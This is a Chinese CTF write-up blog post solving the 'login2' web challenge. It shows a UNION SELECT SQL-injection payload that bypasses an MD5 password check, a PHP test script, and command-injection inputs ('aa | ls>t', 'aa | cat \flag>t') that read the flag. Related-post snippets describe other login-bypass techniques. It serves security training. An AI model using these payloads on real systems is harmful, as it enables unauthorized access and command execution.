ctf-WEB-login2(sql注入)

已于 2022-05-12 22:53:49 修改
阅读量3.2k 收藏 5
点赞数 2
分类专栏: ctf 文章标签: web安全 安全
于 2022-05-12 22:51:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124736570
版权

题目地址:跳转提示

打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种

应当不是基于布尔的盲注,bp抓包看看:

发现响应中有一串奇怪的字符,尝试使用base64解码,得到:

这应该是一个提示,需要绕过其判断条件

这里就可以利用联合查询来注入(union select)

之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕过判断条件,可以payload

username=admi' UNION SELECT 1,md5(11)#&password=11,登录成功

这样就相当于:

$sql="SELECT username,password FROM admin WHERE username='admi' UNION SELECT 1,md5(11)";
if (!empty($row) && $row['password']===md5($password)){
}

要注意,提取数据时很可能只取了结果集的第一行数据,所以要保证输入的用户名是错误的,以确保$row['password']===md5(11);

实验了一下上述语句,推测$row的结构如下:
 

<?php
if($link=mysqli_connect("127.0.0.1","root","root","test")){
	$sql="SELECT username,password FROM admin WHERE username='admi' UNION SELECT 1,md5(11)";
	if($result=mysqli_query($link,$sql)){
		$raw=mysqli_fetch_array($result);
		var_dump($raw);
		mysqli_close($link);
	}else{
		echo mysqli_error;
		die();
	}
}else{
	echo mysqli_connect_error();
	die();
}
?>

 果然登录成功:

随便输入ls,发现结果显示使用了grep命令

再输入命令aa | ls>t

访问网站t目录,果然看到了ls结果

于是尝试输入 aa | cat \flag>t

打开t

BugkuCTF-WEBlogin1
am_03的博客
08-29 1555
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
CTF web入门之SQL注入
最新发布
qq_41701460的博客
04-15 899
HAVING子句用于对聚合数据进行筛选。它通常与GROUP BY一起使用。主要用于聚合函数的条件过滤,可以组合多个条件。十六进制:可以前面加x,后面用引号包裹或者0x;也可以和算数运算结合表示数字。#binascii 库:用于进行二进制数据和 ASCII 编码之间的转换,在本代码中主要用于将字符串转换为十六进制字符串。#requests 库:用于发送 HTTP 请求,在代码里会用它向目标网站发送 POST 请求来进行 SQL 注入尝试。#定义将字符串转换为十六进制字符串的函数。
BugKu-CTF(web)---login2
Nailaoyyds的博客
04-02 4258
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
CTF练习-Web1简单登录
weixin_43992606的博客
06-25 1791
CTF初入门小白,记录做题过程。
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 5774
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
“百度杯” CTF比赛 十月场 Web-登录
qq_34106499的博客
02-18 1652
1. mysql盲注及脚本编写 2. .git泄露
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
bugku-CTFlogin2(SKCTF)(hint:union,命令执行)
Abc_Kimball的博客
01-31 830
本题要点:union绕过、命令执行、脚本编写、base64编码 进入页面 使用弱口令破解,一顿弱口令没卵用 抓包查看不用抓包,直接发送到repeater并且go 看见tip有些乱码,拿走解码,base64解密 sql="SELECTusername,passwordFROMadminWHEREusername=′".sql="SELECT username,password FROM admin WHERE username='".sql="SELECTusername,passwordFROMadmin
CTF-Web SQL注入
weixin_52182264的博客
04-26 4545
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
一道简单的CTF登录题题解
anquanniu的博客
03-06 8482
一、解题感受 这道题50分,在实验吧练习场算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成题目。 所以本文主要是在pc...
“百度杯”CTF比赛 十月场 -------Login
大方子
08-01 3419
============================================================= 个人收获: 1.多观察网页的源代码 2.多留意http的访问信息 3.多留意http头参数的变化 4.收获了unserialize,gzuncompress参数的认识 ================================================...
百度杯”CTF比赛 十月场 login
Naptmn的博客
11-16 1019
1、打开题目 打开题目发现是登录窗口,之后f12发现疑似账号密码的东西,之后输入发现确实是账号密码。 登录之后发现了一串颜文字。 2、bp抓包 因为已经找到了账号密码,所以大概率就不是注入了。之后考虑302跳转,所以进行bp抓包(记得抓的是登录后的包!!!别抓错了)。 并没有跳转,但是在response中发现一个奇怪的参数show:0,考虑是不是应该把他放到包里再来一次。试试就试试。 传递方式注意的是:上面的网址看清楚(我不知道为什么会莫名多出来几个包) show:后面加个空格 之后看response
“百度杯”CTF比赛 十月场_Login
a173262565的博客
04-24 422
题目在i春秋ctf大本营 打开页面是两个登录框,首先判断是不是注入 尝试了各种语句后,发现登录界面似乎并不存在注入 查看网页源代码,给出了一个账号 用帐密登陆后,跳转到到member.php网页,网页本身并没有什么提示内容 接着抓包查看,这里找了好久,最后在返回包的头文件中发现了一个可以参数 尝试在请求头中加入show参数: 返回一段源代码,开始审计之路:...
“百度杯” CTF比赛 九月场 Web-Login
qq_34106499的博客
01-17 767
1. 审查源码需要仔细认真; 2. 抓包查看请求头和响应头,关注陌生属性; 3. php中反序列化的应用; 4.base64编码的使用 5. gzcompress()压缩及gzuncompress()解压的应用。
CTF实验吧-登陆一下好吗??【false SQL注入
Sp4rkW的博客
07-21 4927
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 第一次见到这个,首先的想法自然是or,还有bp看看有没有什么可能存在flag的地方,思考许久,实在想不到,参考了大佬们的write up 思路都是 admin-&gt; ‘=’ password-&gt; '=' 不难猜到数据库存取数据时语句为 $sql = “...
“百度杯”CTF比赛 十月场 Login
feng的博客
09-10 557
WP 打开环境后发现是一个登录的界面,随便试了试发现返回error。 我们f12查看一下源代码,拉到最下面发现了这个: <!-- test1 test1 --> 我以前还真没遇到过用户名和密码直接给在源码里的,而且我以为这题应该就是一个漫长的获得用户名和密码的过程,所以以为这个test1是其他的东西。之后因此进行了很多无用的尝试。。。 我们应该直接用户名和密码输入test1,就可以成功登录,但是打开却是这个东西: 看到这个我的第一反应是颜文字,因为以前碰巧接触过。但是又不是很了解,以为下一
ctfWEB之后台登录
weixin_30340745的博客
06-02 1860
1、后台登录 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句: $sql = "SELECT * FROM admin WHERE username = 'admin' and password ...
虎符ctf web easy_login
weixin_43896279的博客
04-20 2217
虎符ctf web复现easy_login 我们可以先找到这样一个页面 我们可以看到这里明显提示 路径配置有问题 所以这里尝试读取一下app.js 这里我们分析一下逻辑,注册不能注册成admin, 但只有登录后session 中username为admin才可得到flag 所以这里我们伪造登录token 我们先注册一个账户发现会返回一个token 然后登录时token会作为验证 token为...
CTF之登录一下好吗?
Unitue_逆流
04-09 1260
实验吧链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 输入如下手工进行注入
ctf login failed
01-07
### 解决 CTF 登录失败的方法 当遇到 CTF 中登录模块无法正常工作的情况时,可以从多个角度排查问题。以下是几种可能的原因及其解决方案: #### 1. 验证目标主机设置 确保 Metasploit Framework (MSF) 的 `rhosts` 参数已正确配置为目标 IP 地址。如果此参数未被适当设定,则可能导致扫描或利用操作针对错误的目标。 ```bash msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.13[^1] ``` #### 2. 检查服务版本兼容性 确认所使用的漏洞利用代码适用于目标服务器的操作系统和服务版本。例如,在上述场景中提到的是 Linux Ubuntu 和 MySQL 数据库环境下的情况。 对于特定的服务版本号如 '5.5.50-0ubuntu0.14.04.1' ,应当查找是否有对应的 exploit 或者辅助模块可以用于该版本的安全测试工具集内[^2]。 #### 3. 凭据验证与绕过策略 考虑到实际渗透过程中可能会涉及到身份认证环节,因此需要考虑如何获取有效的用户名密码组合来进行进一步深入探索。这可以通过暴力破解字典文件尝试猜测常见弱口令;也可以通过 SQL 注入等手段直接读取数据库中的账户信息表单数据。 一旦获得了合法的身份凭证之后就可以顺利进入后台管理系统执行更多命令了。然而值得注意的是这里描述的行为仅限于授权范围内的安全评估活动之中,并严格遵循法律法规的要求[^3]。 #### 4. 调试日志分析 查看并理解来自框架的日志输出可以帮助定位具体原因所在之处。比如时间戳 `[09:56:32][INFO]...` 提供的时间线有助于追踪事件发生的顺序以及任何异常状况的发生时刻。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值